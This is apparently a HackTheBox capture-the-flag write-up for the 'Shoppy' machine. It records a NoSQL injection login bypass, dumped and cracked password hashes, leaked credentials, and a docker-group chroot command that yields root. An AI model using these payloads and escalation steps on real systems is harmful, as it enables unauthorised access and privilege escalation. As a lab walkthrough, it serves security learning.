Shoppy - HTB - Key Points
October 25, 2022•424 words
Target's IP: 10.10.11.180
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9093/tcp open copycat
The login suffers from NoSQL injection, we can bypass the login stage with
username=admin'||'1==1//&password=aaasa Again, injecting the user search and downloading the export:
username "admin"
password "23c6877d9e2b564ef8b32c3a23de27b2"
username "josh"
password "6ebcea65320589ca4f2f1ce039975995"
These look like md5 hashes, trying hashcat to crack them:
6ebcea65320589ca4f2f1ce039975995:remembermethiswayEnumerating for subdomains, there is a mattermost where user josh can login.
It's a chat app that contains credentials for the machine:
For the deploy machine, you can create an account with these creds :
username: jaeger
password: Sh0ppyBest@pp!
jaeger@shoppy:~$ sudo -l
[sudo] password for jaeger:
Matching Defaults entries for jaeger on shoppy:
envreset, mailbadpass, securepath=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User jaeger may run the following commands on shoppy:
(deploy) /home/deploy/password-manager
Binary asks for password. Opening it in radare shows some strings that might be the correct password, even without understanding the assembly.
As a matter of fact, "Sample" is the password, the output of the binary is:
jaeger@shoppy:~$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!
deploy is in the docker group, follow gtfobins for final privesc
$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# whoami
root
# cd /root
# ls -al
total 32
drwx------ 5 root root 4096 Aug 10 05:00 .
drwxr-xr-x 19 root root 4096 Sep 12 13:36 ..
lrwxrwxrwx 1 root root 9 Jul 22 11:46 .bashhistory -> /dev/null
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
drwx------ 3 root root 4096 Jul 22 11:40 .cache
drwx------ 3 root docker 4096 Jul 22 13:32 .config
lrwxrwxrwx 1 root root 9 Jul 23 05:17 .dbshell -> /dev/null
drwxr-xr-x 3 root root 4096 Jul 22 11:47 .local
-rw------- 1 root root 0 Jul 23 05:16 .mongorc.js
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-rw-r----- 1 root root 33 Oct 13 00:26 root.txt
# cat root.txt
45...58
# cat /home/jaeger/user.txt
41...b0
#
Merry hacking ;)